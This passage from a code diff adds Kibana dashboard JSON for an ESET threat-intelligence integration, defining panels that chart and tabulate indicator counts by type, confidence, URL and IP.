"enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "logs-*", + "key": "threat.indicator.type", + "negate": false, + "params": [ + "domain-name", + "ipv4-addr", + "url" + ], + "type": "phrases", + "value": [ + "domain-name", + "ipv4-addr", + "url" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + 
"threat.indicator.type": "domain-name" + } + }, + { + "match_phrase": { + "threat.indicator.type": "ipv4-addr" + } + }, + { + "match_phrase": { + "threat.indicator.type": "url" + } + } + ] + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### ESET Threat Intelligence\n**Navigation**\n\n- [Overview](/app/dashboards#/view/ti_eset-f608e350-8192-11ee-a704-a3364df0a052)\n- **[Domains, URL, IP (This page)](/app/dashboards#/view/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052)**\n- [Files](/app/dashboards#/view/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052)\n- [Other indicators](/app/dashboards#/view/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052)\n\n[Integrations Page](/app/integrations/detail/ti_eset/overview)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 20, + "i": "dc4aa363-7c3d-4e4e-8d2d-1e6997575cec", + "w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "dc4aa363-7c3d-4e4e-8d2d-1e6997575cec", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "eba6f3ca-af23-403f-8828-7c7a11af1337": { + "columnOrder": [ + "b2694625-806e-4d4d-b96a-0b3ea2037123" + ], + "columns": { + 
"b2694625-806e-4d4d-b96a-0b3ea2037123": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total indicators", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b2694625-806e-4d4d-b96a-0b3ea2037123", + "colorMode": "Labels", + "layerId": "eba6f3ca-af23-403f-8828-7c7a11af1337", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#ff5d5d", + "stop": null + }, + { + "color": "#005e4f", + "stop": 1 + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#ff5d5d", + "stop": 1 + }, + { + "color": "#005e4f", + "stop": 81780 + } + ] + }, + "type": "palette" + }, + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "38c8f7af-022b-4fd7-bd1c-b91a734261a1", + "w": 7, + "x": 8, + "y": 0 + }, + "panelIndex": "38c8f7af-022b-4fd7-bd1c-b91a734261a1", + "title": "Total indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 
"e90d8bf4-3571-4bce-9ab0-548c27b3137b": { + "columnOrder": [ + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29", + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26" + ], + "columns": { + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "cabd22d9-d28a-48b9-9488-0429758e1bcd", + "w": 12, + "x": 15, + "y": 0 + }, + "panelIndex": "cabd22d9-d28a-48b9-9488-0429758e1bcd", + "title": "Indicators by type", + "type": "lens", + "version": "8.10.1" + }, + { + 
"embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "08036a92-d500-4966-98ca-feff7f9ecb36": { + "columnOrder": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15", + "67920793-58db-49b6-aca9-273945fffbce" + ], + "columns": { + "67920793-58db-49b6-aca9-273945fffbce": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "99f24050-c517-46ff-85b1-f3ceea4c9e15": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.confidence", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "67920793-58db-49b6-aca9-273945fffbce", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.confidence" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "08036a92-d500-4966-98ca-feff7f9ecb36", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "67920793-58db-49b6-aca9-273945fffbce" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "7cce4c5e-ec8a-42c0-9f58-6da1ddf7f40e", + "w": 13, + "x": 27, + "y": 0 + }, + "panelIndex": "7cce4c5e-ec8a-42c0-9f58-6da1ddf7f40e", + "title": "Confidence Levels", + 
"type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "eba6f3ca-af23-403f-8828-7c7a11af1337": { + "columnOrder": [ + "b2694625-806e-4d4d-b96a-0b3ea2037123" + ], + "columns": { + "b2694625-806e-4d4d-b96a-0b3ea2037123": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique URL", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.url.original" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b2694625-806e-4d4d-b96a-0b3ea2037123", + "layerId": "eba6f3ca-af23-403f-8828-7c7a11af1337", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 5, + "i": "9e41f7fc-2582-4d91-b3b7-91281c360838", + "w": 8, + "x": 40, + "y": 0 + }, + "panelIndex": "9e41f7fc-2582-4d91-b3b7-91281c360838", + "title": "Unique URL", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "eba6f3ca-af23-403f-8828-7c7a11af1337": { + 
"columnOrder": [ + "b2694625-806e-4d4d-b96a-0b3ea2037123" + ], + "columns": { + "b2694625-806e-4d4d-b96a-0b3ea2037123": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique IP", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.ip" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b2694625-806e-4d4d-b96a-0b3ea2037123", + "layerId": "eba6f3ca-af23-403f-8828-7c7a11af1337", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 5, + "i": "8a76c979-6f54-4f47-a865-dfe8fee772c3", + "w": 8, + "x": 40, + "y": 5 + }, + "panelIndex": "8a76c979-6f54-4f47-a865-dfe8fee772c3", + "title": "Unique IP", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6c4a95f2-3075-4c44-9fff-40181d8cce3f": { + "columnOrder": [ + "36f43d23-f250-4744-a941-bbe07de60f42", + "72db0f24-0ba3-4ffc-a6cd-7cc80909757f", + "1ba9e8df-59e9-44b5-84a8-498f18b8e825" + ], + "columns": { + "1ba9e8df-59e9-44b5-84a8-498f18b8e825": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + 
"36f43d23-f250-4744-a941-bbe07de60f42": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1ba9e8df-59e9-44b5-84a8-498f18b8e825", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "72db0f24-0ba3-4ffc-a6cd-7cc80909757f": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1ba9e8df-59e9-44b5-84a8-498f18b8e825" + ], + "layerId": "6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "36f43d23-f250-4744-a941-bbe07de60f42", + "xAccessor": "72db0f24-0ba3-4ffc-a6cd-7cc80909757f" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + 
"title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "21c48eac-80b2-450e-8f8d-c40be77c8d99", + "w": 19, + "x": 8, + "y": 10 + }, + "panelIndex": "21c48eac-80b2-450e-8f8d-c40be77c8d99", + "title": "Indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa6ca743-61a5-4276-894b-f2478d6ac1c9": { + "columnOrder": [ + "8015bd06-c3b9-492a-9713-31d26536b422", + "ec324dcc-c341-408f-961d-bf050d2ba5f0" + ], + "columns": { + "8015bd06-c3b9-492a-9713-31d26536b422": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top indicators by description", + "operationType": "terms", + "params": { + "accuracyMode": true, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "threat.indicator.description" + ], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "ec324dcc-c341-408f-961d-bf050d2ba5f0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } + }, + 
"indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "left", + "colorMode": "none", + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422", + "oneClickFilter": true + }, + { + "alignment": "left", + "colorMode": "none", + "columnId": "ec324dcc-c341-408f-961d-bf050d2ba5f0" + } + ], + "headerRowHeight": "single", + "headerRowHeightLines": 1, + "layerId": "fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1, + "sorting": { + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422" + } + } + }, + "title": "Indicators description (copy) (converted)", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "2726f3d0-943f-4418-8c22-31d25fe03bda", + "w": 21, + "x": 27, + "y": 10 + }, + "panelIndex": "2726f3d0-943f-4418-8c22-31d25fe03bda", + "title": "Indicators by description", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-86096b09-0ab9-4214-b04f-b2391fd61147", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "86096b09-0ab9-4214-b04f-b2391fd61147": { + "columnOrder": [ + "1f2b114b-bc62-43f5-870c-36956387c6d0", + "5499f656-a586-4d96-bf0b-d27c1ee112d9" + ], + "columns": { + "1f2b114b-bc62-43f5-870c-36956387c6d0": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Top values by IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5499f656-a586-4d96-bf0b-d27c1ee112d9", + 
"type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 50 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.ip" + }, + "5499f656-a586-4d96-bf0b-d27c1ee112d9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "1f2b114b-bc62-43f5-870c-36956387c6d0", + "oneClickFilter": true + }, + { + "alignment": "left", + "columnId": "5499f656-a586-4d96-bf0b-d27c1ee112d9" + } + ], + "layerId": "86096b09-0ab9-4214-b04f-b2391fd61147", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 10, + "i": "68123f4c-d31c-4fda-ac32-a1cd396ec5d3", + "w": 19, + "x": 8, + "y": 20 + }, + "panelIndex": "68123f4c-d31c-4fda-ac32-a1cd396ec5d3", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa6ca743-61a5-4276-894b-f2478d6ac1c9": { + "columnOrder": [ + "8015bd06-c3b9-492a-9713-31d26536b422", + "ec324dcc-c341-408f-961d-bf050d2ba5f0" + ], + "columns": { + "8015bd06-c3b9-492a-9713-31d26536b422": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top indicators by URL", + "operationType": "terms", + "params": { + "accuracyMode": 
true, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "threat.indicator.url.original" + ], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "ec324dcc-c341-408f-961d-bf050d2ba5f0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "left", + "colorMode": "none", + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422", + "oneClickFilter": true + }, + { + "alignment": "left", + "colorMode": "none", + "columnId": "ec324dcc-c341-408f-961d-bf050d2ba5f0" + } + ], + "headerRowHeight": "single", + "headerRowHeightLines": 1, + "layerId": "fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1, + "sorting": { + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422" + } + } + }, + "title": "Indicators description (copy) (converted)", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "5f3fcac2-8e16-42f2-89d2-499486a1dd54", + "w": 21, + "x": 27, + "y": 20 + }, + "panelIndex": 
"5f3fcac2-8e16-42f2-89d2-499486a1dd54", + "title": "", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs ESET] Domains, URL, IP", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-23T11:26:43.468Z", + "id": "ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "38c8f7af-022b-4fd7-bd1c-b91a734261a1:indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cabd22d9-d28a-48b9-9488-0429758e1bcd:indexpattern-datasource-layer-e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7cce4c5e-ec8a-42c0-9f58-6da1ddf7f40e:indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9e41f7fc-2582-4d91-b3b7-91281c360838:indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8a76c979-6f54-4f47-a865-dfe8fee772c3:indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "21c48eac-80b2-450e-8f8d-c40be77c8d99:indexpattern-datasource-layer-6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2726f3d0-943f-4418-8c22-31d25fe03bda:indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68123f4c-d31c-4fda-ac32-a1cd396ec5d3:indexpattern-datasource-layer-86096b09-0ab9-4214-b04f-b2391fd61147", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5f3fcac2-8e16-42f2-89d2-499486a1dd54:indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": 
"index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_91dfea82-e7ea-473c-adfa-45623e39ba59:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "name": "tag-ref-ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "type": "tag" + }, + { + "id": "ti_eset-security-solution-default", + "name": "tag-ref-ti_eset-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/dashboard/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/dashboard/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..d346f69b5dd --- /dev/null +++ b/packages/ti_eset/kibana/dashboard/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052.json 
@@ -0,0 +1,817 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"bec9c1a6-faec-4fed-898d-24bc09666953\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"bec9c1a6-faec-4fed-898d-24bc09666953\",\"fieldName\":\"data_stream.dataset\",\"title\":\"Feed name\",\"grow\":false,\"width\":\"medium\",\"selectedOptions\":[],\"existsSelected\":false,\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "_index", + "index": "logs-*", + "key": "_index", + "negate": false, + "params": { + "query": "logs-ti_eset_latest.*" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "_index": "logs-ti_eset_latest.*" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "logs-*", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "file" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "file" + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + 
}, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### ESET Threat Intelligence\n**Navigation**\n\n- [Overview](/app/dashboards#/view/ti_eset-f608e350-8192-11ee-a704-a3364df0a052)\n- [Domains, URL, IP](/app/dashboards#/view/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052)\n- **[Files (This page)](/app/dashboards#/view/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052)**\n- [Other indicators](/app/dashboards#/view/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052)\n\n[Integrations Page](/app/integrations/detail/ti_eset/overview)\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 21, + "i": "b30b52a3-abc6-4437-8c11-156d830c01f6", + "w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "b30b52a3-abc6-4437-8c11-156d830c01f6", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "08036a92-d500-4966-98ca-feff7f9ecb36": { + "columnOrder": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15", + "67920793-58db-49b6-aca9-273945fffbce" + ], + "columns": { + "67920793-58db-49b6-aca9-273945fffbce": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "99f24050-c517-46ff-85b1-f3ceea4c9e15": { + "dataType": "string", + "isBucketed": 
